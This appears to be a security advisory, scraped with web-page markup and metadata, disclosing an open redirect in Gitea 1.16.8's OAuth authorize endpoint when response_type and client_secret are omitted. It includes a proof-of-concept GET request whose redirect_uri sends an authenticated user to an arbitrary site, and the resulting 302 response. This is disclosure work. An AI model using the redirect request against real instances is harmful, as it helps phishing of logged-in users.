[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.17.6\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"]<\/p>\n
Advisory ID<\/strong>: usd-2022-0023 Gitea implements OAuth. However if the response_type=code<\/strong> and client_secret<\/strong> parameter are not set in the request, the application redirects the user to the value provided within the redirect_uri<\/strong> parameter.<\/p>\n You need to have a valid client_id<\/strong> to make this working. You can configure one in your account. The victim needs to be authenticated, otherwise the victim will be redirected to the login page and will be redirected to the page after login.<\/p>\n Exemplary request:<\/p>\n Corresponding response:<\/p>\n The OAuth implementation should follow the \"OAuth 2.0 Security Best Current Practice\"<\/p>\n This security vulnerability was identified by Christian P\u00f6schl of usd AG.<\/p>\n [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":" usd-2022-0023 | Open Redirect in Gitea Advisory ID: usd-2022-0023 Product: Gitea Affected Version: 1.16.8 Vulnerability Type: https:\/\/cwe.mitre.org\/data\/definitions\/601.html Security Risk: Medium Vendor URL: https:\/\/gitea.io\/ Vendor Status: Fixed Advisory Status: Closed CVE number: Not requested yet CVE Link: Not requested yet First Published: Not published yet Last Update: 2022-06-30 Description Gitea implements OAuth. However if the response_type=code […]<\/p>\n","protected":false},"author":109,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-22993","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/22993","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/109"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=22993"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/22993\/revisions"}],"predecessor-version":[{"id":23124,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/22993\/revisions\/23124"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=22993"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\nProduct<\/strong>: Gitea Affected Version: 1.16.8
\nVulnerability Type<\/strong>: https:\/\/cwe.mitre.org\/data\/definitions\/601.html<\/a>
\nSecurity Risk<\/strong>: Medium
\nVendor URL<\/strong>: https:\/\/gitea.io\/<\/a>
\nVendor Status<\/strong>: Fixed
\nAdvisory Status<\/strong>: Closed
\nCVE number<\/strong>: Not requested yet
\nCVE Link<\/strong>: Not requested yet
\nFirst Published<\/strong>: Not published yet
\nLast Update<\/strong>: 2022-06-30<\/p>\nDescription<\/h3>\n
Proof of Concept<\/h3>\n
<\/span>GET<\/span> \/login\/oauth\/authorize?client_id=5445d361-XXXf&redirect_uri=https:\/\/usd.de<\/span> HTTP<\/span>\/<\/span>1.1<\/span>
Host<\/span>:<\/span> localhost:3000<\/span>
sec-ch-ua<\/span>:<\/span> \"Chromium\";v=\"97\", \" Not;A Brand\";v=\"99\"<\/span>
sec-ch-ua-mobile<\/span>:<\/span> ?0<\/span>
sec-ch-ua-platform<\/span>:<\/span> \"Linux\"<\/span>
Upgrade-Insecure-Requests<\/span>:<\/span> 1<\/span>
User-Agent<\/span>:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/97.0.4692.99 Safari\/537.36<\/span>
Cookie<\/span>:<\/span> XXX<\/span>
Connection<\/span>:<\/span> close<\/span>
<\/pre>\n<\/div>\n<\/span>HTTP<\/span>\/<\/span>1.1<\/span> 302<\/span> Found<\/span>
Content-Type<\/span>:<\/span> text\/html; charset=utf-8<\/span>
Location<\/span>:<\/span> https:\/\/usd.de?error=unsupported_response_type&error_description=Only+code+response+type+is+supported.&state=<\/span>
Set-Cookie<\/span>:<\/span> _csrf=s[...]; Path=\/; Expires=Tue, 21 Jun 2022 14:34:58 GMT; HttpOnly; SameSite=Lax<\/span>
Set-Cookie<\/span>:<\/span> macaron_flash=; Path=\/; Max-Age=0; HttpOnly; SameSite=Lax<\/span>
X-Frame-Options<\/span>:<\/span> SAMEORIGIN<\/span>
Date<\/span>:<\/span> Mon, 20 Jun 2022 14:34:58 GMT<\/span>
Content-Length<\/span>:<\/span> 140<\/span>
Connection<\/span>:<\/span> close<\/span>\n\n<<\/span>a<\/span> href<\/span>=<\/span>\"https:\/\/usd.de?error=unsupported_response_type&error_description=Only+code+response+type+is+supported.&state=\"<\/span>><\/span>Found<\/<\/span>a<\/span>><\/span>.\n<\/pre>\n<\/div>\nFix<\/h3>\n
References<\/h3>\n
\n
Timeline<\/h3>\n
\n
Credits<\/h3>\n